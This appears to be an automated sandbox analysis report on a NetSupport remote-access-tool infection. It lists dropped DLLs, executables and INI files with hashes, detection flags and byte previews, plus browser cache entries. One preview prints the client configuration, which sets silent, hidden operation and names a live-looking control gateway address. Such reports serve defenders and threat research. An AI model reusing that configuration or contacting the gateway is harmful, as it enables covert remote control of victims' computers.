                                                                                                                                                              SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                                                                                              MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                                                                                              SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                                                                                              SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                                                                                              SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\NSM.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:Generic INItialization configuration [Features]
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6458
                                                                                                                                                              Entropy (8bit):4.645519507940197
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                                                              MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                                                              SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                                                              SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                                                              SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18808
                                                                                                                                                              Entropy (8bit):6.22028391196942
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                                              MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                                              SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                                              SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                                              SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3735416
                                                                                                                                                              Entropy (8bit):6.525042992590476
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                                                                                              MD5:00587238D16012152C2E951A087F2CC9
                                                                                                                                                              SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                                                                                              SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                                                                                              SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):396664
                                                                                                                                                              Entropy (8bit):6.809064783360712
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                                                                              MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                                                                              SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                                                                              SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                                                                              SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\client32.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):120288
                                                                                                                                                              Entropy (8bit):5.258428134726746
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:zfVZl6FhWr80/SqUr2pe/3NPHDHf/ckvKoGr2pe/kCHDHf/ckPG:z70hGaq0ee/3hjHTIee/djHC
                                                                                                                                                              MD5:EE75B57B9300AAB96530503BFAE8A2F2
                                                                                                                                                              SHA1:98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07
                                                                                                                                                              SHA-256:06A0A243811E9C4738A9D413597659CA8D07B00F640B74ADC9CB351C179B3268
                                                                                                                                                              SHA-512:660259BB0FD317C7FB76505DA8CBC477E146615FEC10E02779CD4F527AEB00CAED833AF72F90B128BB62F10326209125E809712D9ACB41017E503126E5F85673
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.g.W.g.W.g.^...U.g.8...T.g.W.f.R.g.8..V.g.8...V.g.8...V.g.RichW.g.........PE..L...1.oe.....................r...... ........ ....@..................................b....@.................................< ..<....0..Hm...........x...].......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc...Hm...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\client32.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):647
                                                                                                                                                              Entropy (8bit):5.603856649376801
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:F1xS2lMfGShR8kkiBlsVTXuZ7/P981E7GXXfDWQCYublu+vQv4FASv4pv4i:bI2MNR8piBlLI1fXXfD/uAv4FASv4pv7
                                                                                                                                                              MD5:8C978A6D8F380D59C9DB4AFE06218B89
                                                                                                                                                              SHA1:1FA286E91C8AA0EEB99276AF72D40E02D2148C51
                                                                                                                                                              SHA-256:D8C2B28FF9F90626F7E669B4FBDB45ED553A3CB1A980E23FDFEA4FBBDDDFC502
                                                                                                                                                              SHA-512:B74539AE7FC88756C1E1404814D33197CD8709AADDF2C43167F2CF157E947C2CABAD759414038DBE5E83B201786052E94AB53BD97BB4DE68744F514F8AE7F552
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:0xe755af83....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableCloseApps=0..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=92.255.85.135:443..gsk=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..gskmode=0..GSK=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..GSKX=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\msvcr100.dll

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):773968
                                                                                                                                                              Entropy (8bit):6.901559811406837
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                              MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                              SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                              SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                              SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\nskbfltr.inf

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:Windows setup INFormation
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):328
                                                                                                                                                              Entropy (8bit):4.93007757242403
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                              MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                              SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                              SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                              SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):33144
                                                                                                                                                              Entropy (8bit):6.737780491933496
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                                              MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                                              SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                                              SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                                              SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):77280
                                                                                                                                                              Entropy (8bit):6.793716898125355
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:SfafvTuNOwphKuyUHTqYXHhrXH4LLIywmoEee/wjHnee/ssjHai:kafLSpAFUzt0LLIywYehjHeyjH
                                                                                                                                                              MD5:1768C9971CEA4CC10C7DD45A5F8F022A
                                                                                                                                                              SHA1:3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7
                                                                                                                                                              SHA-256:6558B3307215C4B73FC96DC552213427FB9B28C0CB282FE6C38324F1E68E87D6
                                                                                                                                                              SHA-512:F83BF23ABCE316CB1B91A0AC89C1A709A58A7EC49C8493140AD7DC7A629E8F75032057889E42BE3091CF351760348380634F660C47A3897F69E398849CA46780
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...T.oe.....................J.......!............@.......................... ......Q.....@....................................<.......8................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...8...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              Chrome Cache Entry: 82

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):52648
                                                                                                                                                              Entropy (8bit):7.996033428788516
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:1536:9eBlxzWRUJTVGP5v267Q1Sk+S2/D8l+8O2:9maeeP5v267Q7w8z
                                                                                                                                                              MD5:657E828FB3A5963706E24CBF9D711BB8
                                                                                                                                                              SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                                                                                                                                              SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                                                                                                                                              SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
                                                                                                                                                              Preview:wOF2.............r....V.........................T.V..f...h..X.6.$..|..... ..*..m[.#qB.......*...v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2|/F...PR*J4[ &..b....E......../...q..4`M*D.c...-|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B*..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."*F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.|

                                                                                                                                                              Chrome Cache Entry: 83

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (33229)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):33407
                                                                                                                                                              Entropy (8bit):4.7584710387647835
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:Wb+rB31zxcjzc61CrDam31bvG91QCQ/HUMNYmB1vcv/PEsQ/4j:731zxcfc6IyUFv61dQ/0MOm3izQ/Y
                                                                                                                                                              MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                                                                                                                                              SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                                                                                                                                              SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                                                                                                                                              SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                                                                                                              Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float

                                                                                                                                                              Chrome Cache Entry: 84

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (764)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):769
                                                                                                                                                              Entropy (8bit):5.120187501927207
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:xNpAp3XATntcBHslgT9lCuABuc7HHHHHHHYqmffffffo:xjIXOqKlgZ01BucEqmffffffo
                                                                                                                                                              MD5:185167AECC19DE1F81AB42043B33E3A8
                                                                                                                                                              SHA1:F94AE64C2B35F284021F93C7D6C3D4B2559E7628
                                                                                                                                                              SHA-256:DEA696E4F82D00AF33066449CB0711CAC3AE9AD6678BA618A715E4E49851E248
                                                                                                                                                              SHA-512:8FAD799AF19AB709BC3C3E75E7CC440619A03255966D106233A9BEC22B8F76BD1BCA9CE75A0CBE0955C03DCDB852914DE033844D21F8294537C28990AC136857
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                              Preview:)]}'.["",["episode 7 tulsa king","apple intelligence ios 18.1","baltimore ravens vs cleveland browns","mortgage rates today","pope francis synod","videos","carolina panthers denver broncos","american airlines brisbane flight"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1251,1250,605,604,603,602,601,600],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                              Chrome Cache Entry: 85

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65488), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):67842
                                                                                                                                                              Entropy (8bit):5.787506376022805
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:12TKAL+nNvaKqSx7XXfeYrhIyx5qdtDR1Ef9ukDE:12TKA6tNdx7LSDR10UkDE
                                                                                                                                                              MD5:4D89ED3D2A8794DF472F060337B87424
                                                                                                                                                              SHA1:3F1F098C00C7C3B51D7714E7BC78FA2E065B2C10
                                                                                                                                                              SHA-256:D5474245A06F3FE94F9DFACCB3317A91433B158D6A0DF7A69B88E330EA1E489B
                                                                                                                                                              SHA-512:6B800F39F09B898EA39C4098F6C374964D13B2450600E57D989C498251D7A481AA036B4C711C5D50F7F07A0FF3D17D8A45E347841AD222B3E75096F66F710872
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://inspyrehomedesign.com/
